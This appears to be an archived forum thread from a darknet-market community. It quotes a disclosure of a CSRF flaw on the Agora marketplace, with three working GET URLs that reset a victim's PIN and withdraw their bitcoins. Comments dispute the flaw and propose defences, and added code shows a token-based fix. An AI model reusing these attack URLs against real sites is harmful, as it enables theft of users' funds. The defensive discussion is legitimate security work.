[Complaint/Warning] Agora CRSF Flaw pretty serious.

Agora CRSF Flaw, fairly major. Has it been patched? http://seclists.org/fulldisclosure/2015/Feb/64

I haven't seen a thing about this on the DNM subreddit so here is the breakdown, if anyone can chime in with a "yea this is fixed" that would be awesome.

"Agora Marketplace CSRF to Steal Bitcoins (agorahooawayyfoe.onion) From: agoraagoraagora () hushmail com Date: Wed, 18 Feb 2015 06:11:36 +0000

Ladies and gentlemen, boys and girls. It has come to our attention that a brave warrior for the people, Ross William Ulbricht, was unlawfully convicted by the corporation known as the American government.

This mockery of justice has not gone unnoticed.

In order to protect the next generation of darknet markets we will be disclosing vulnerabilities for these sites in order to make these sites safer from attack.

To start, the Agora Marketplace contains a CSRF vulnerability which can be used to drain a victim account of all of their Bitcoins. The following URLs can be used to perform this attack:

URL to start PIN reset: http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=

URL to change current PIN: http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save

URL to send bitcoins using the new pin: http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send

These are all GET requests and don't require JavaScript to work. NoScript cannot save you from poor coding practices.

There will be more to come. Stay safe. Stay anonymous.

-The Guardians of Peace "


Comments


[14 Points] Vendor_BBMC:

This is bollocks.

Agora is now a bitcoinless marketplace. All the wallet trouble was the changeover.

Bitcoin gets left at the door, and tumbled while you are handed casino chips to spend in the marketplace.

When the vendor withdraws funds, the casino chips are replaced with bitcoin sent from the tumbler outside the door. Inside, the escrows, commission, postage, finalizing, refunds - are all just maths. Nothing occurs on the blockchain. It's a fly-by-wire marketplace without bitcoin or wallets. 4% less is sent to vendors than is deposited by buyers - their commission.

Remember how deposits weren't being credited to you on the market, but all the internal trading continued to work when the tumbler and wallets weren't working? The big roundabout tumbler wheel outside the casino wasn't attached. It was just freewheeling.

Agora will get this kind of ill-thought blackmail or scam attempt every day of the week. Nobody can "hack" their "escrow wallet". There isn't one.


[3 Points] JohnTSchmitz:

What fine rhetoric.

Kill the pigs ... death to whitey ... Attica!


[3 Points] None:

Agora needs to implement a randomly generated unique key as a token that only the client's browser knows. This will mitigate a CSRF attack as the attacker will need to know the key as well to make POST or GET requests.

The token could still be compromised if the coding uses POST or GET requests to input into unfiltered fields.

If both vectors are protected, the only probable way to further compromise the user to get the token would be to actually attack the client's system directly, which would no longer be a problem with Agora.
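An added illustration of the mitigation this comment describes (example code written for this thread, not Agora's code; the handler and field names are hypothetical): a minimal model of a state-changing handler, first in the GET-driven style the disclosure describes, then hardened so that it only acts on POST and only when the request carries the random per-session token that a cross-site page cannot read.

```python
# Added example, not Agora's code. Models one state-changing action
# (a withdrawal) with and without anti-CSRF controls.
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    """Server-side session; the token is random and known only to the
    client's own browser (sent back in the form, never in the URL)."""
    user: str
    balance: int
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    method: str          # "GET" or "POST"
    params: dict         # query or form parameters, attacker-influenced
    session: Session     # cookie-bound session, sent automatically


def _parse_amount(params: dict, balance: int):
    try:
        amount = int(params.get("targetamount", "0"))
    except ValueError:
        return None
    return amount if 0 < amount <= balance else None


def send_vulnerable(req: Request) -> str:
    """GET handler in the style the disclosure describes: any request that
    carries the session cookie and the right parameters moves funds."""
    amount = _parse_amount(req.params, req.session.balance)
    if amount is None:
        return "rejected: amount"
    req.session.balance -= amount
    return "sent"


def send_hardened(req: Request) -> str:
    """Same action with two controls: no state change on GET, and the
    submitted token must match the session's token (constant-time)."""
    if req.method != "POST":
        return "rejected: method"
    supplied = req.params.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), req.session.csrf_token.encode()):
        return "rejected: csrf"
    amount = _parse_amount(req.params, req.session.balance)
    if amount is None:
        return "rejected: amount"
    req.session.balance -= amount
    return "sent"
```

As the comment notes, the token only helps while it stays secret: if a page reflects unfiltered input, a script injected there runs in the victim's origin and can read the token, so input handling has to be fixed alongside the token check.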


[2 Points] Csrfthrowaway1:

Yeah ok cool, I created a throwaway account on Agora with some BTC in it. Anyone care to give me some link to click using Tor and Noscript and show me how he steals my coins using the above..? Sounds like a fun experiment no?


[2 Points] rant-caseydnm:

csrf*


[2 Points] gwern:

There wasn't much interest at https://www.reddit.com/r/AgMarketplace/comments/2wgrg4/agora_marketplace_csrf_to_steal_bitcoins/


[1 Points] STB_KING:

Thank you.

This is exactly what this community needs.


[-2 Points] 888b:

So I appreciate your concern for keeping the site and users safe but why give the exact directions to violate victims? That wasn't needed to validate your claim.


[-2 Points] Vendor_BBMC:

What does CRSF stand for, EmeraldGemeni?

Are you recommending we take heed of this psychopath calling himself the guardians of peace?

Or are you telling us it's an obvious hoax. Don't click any of the links under any circumstances?

Psychos ALWAYS do that "stay safe, people" thing at the end.

Yeah, safe from YOU mate. You need to stop feeling out whether to blackmail or continue pretending to be a good but vaguely threatening citizen.

Normal people aren't 2 things at once.

Either recommendation is valid, rant-caseydnm. I realize you want the truth as much as we all do. Nothing for you to get angry about, just want to make it clear that any criticism from me is aimed at the dickless dweeb pretending to be some superheroes. Not at you for bringing it to our attention.